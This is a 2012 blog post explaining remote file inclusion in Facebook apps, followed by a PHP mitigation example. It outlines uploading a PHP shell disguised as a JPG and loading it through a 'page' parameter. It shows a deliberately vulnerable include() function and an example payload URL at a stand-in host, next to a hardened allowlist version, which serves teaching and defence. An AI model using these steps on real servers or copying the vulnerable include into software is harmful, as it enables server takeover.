Monday, April 16, 2012

Facebook Hacking: Remote File Inclusion Attack By Anzul Aqueel Soherwardi


Facebook, being the world's largest social networking website, has become a major target for hackers, attackers and other malicious users. Facebook has hired a team of the world's leading security experts to improve the website's security. Moreover, Facebook also pays $500 to anyone who can identify a vulnerability in Facebook.
The Facebook security team has done a great job in raising Facebook's security to a high level. However, the problem is that Facebook applications are not coded or monitored by Facebook, and it is not possible for Facebook to monitor every single app for vulnerabilities. These Facebook apps are mostly coded by ordinary programmers who are not well aware of how to write code securely, which leaves Facebook apps riddled with common vulnerabilities such as XSS (cross-site scripting), clickjacking, remote file inclusion, etc.

Of all these web application vulnerabilities, remote file inclusion is a very common attack. It occurs because the application does not validate the files it includes. According to Imperva, 21% of the apps on Facebook are vulnerable to remote file inclusion.

Here is how the attack is carried out:

Step 1 - The attacker creates a malicious JPG file, because uploading PHP files is usually blocked on web servers for user-level accounts. The attacker therefore renames a PHP shell to something like shell.php.jpg in order to upload it to the web server.

Step 2 - Next the attacker exploits the RFI vulnerability to reference the malicious JPG. The vulnerable parameter looks something like:

.php?page=url of the malicious image

Step 3 - Next the attacker takes control of the server simply by visiting the URL of the JPG image.

Mitigation:

Imperva suggests a four-step mitigation process, which can be found in the image below. However, it includes deploying a web application firewall; what if someone is not using a WAF, how will they be protected?
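For an app that has no WAF in front of it, the protection has to come from the code itself. The following is an added example, not code from the original post or from Imperva: it shows the `include($_GET['page'])` pattern that the `.php?page=` step above abuses, beside a hardened version that maps the parameter onto a fixed allowlist of local files so that the user-supplied string never becomes a path or URL. The file names and the `PAGES` map are assumptions for illustration.

```php
<?php
// Added example (not from the original post): the include pattern behind the
// RFI attack described above, and a hardened replacement.

// VULNERABLE: the request parameter is passed straight to include().
// With allow_url_include=On, PHP fetches and executes whatever URL is given
// (e.g. ?page=http://example.invalid/shell.php.jpg); even with it Off, the
// parameter can still traverse to arbitrary local files.
function render_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: a fixed map from page names to files (assumed names for this example).
// Lookup happens on the map keys only, so the attacker-controlled string is
// never used to build a path.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Returns the local file for a known page name, or null for anything else.
function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;
}

function render_page_hardened(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    // Anchor the include to this script's directory; $file comes from the
    // map above, not from the request.
    include __DIR__ . '/' . $file;
}

render_page_hardened($_GET['page'] ?? 'home');
```

Two server-side settings complement the allowlist: setting `allow_url_include = Off` (and, where the application does not need it, `allow_url_fopen = Off`) in php.ini stops `include` from fetching remote URLs at all, so a missed parameter cannot turn into remote code execution. The allowlist is still the primary control, because it also blocks local file inclusion, which the ini settings do not address.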
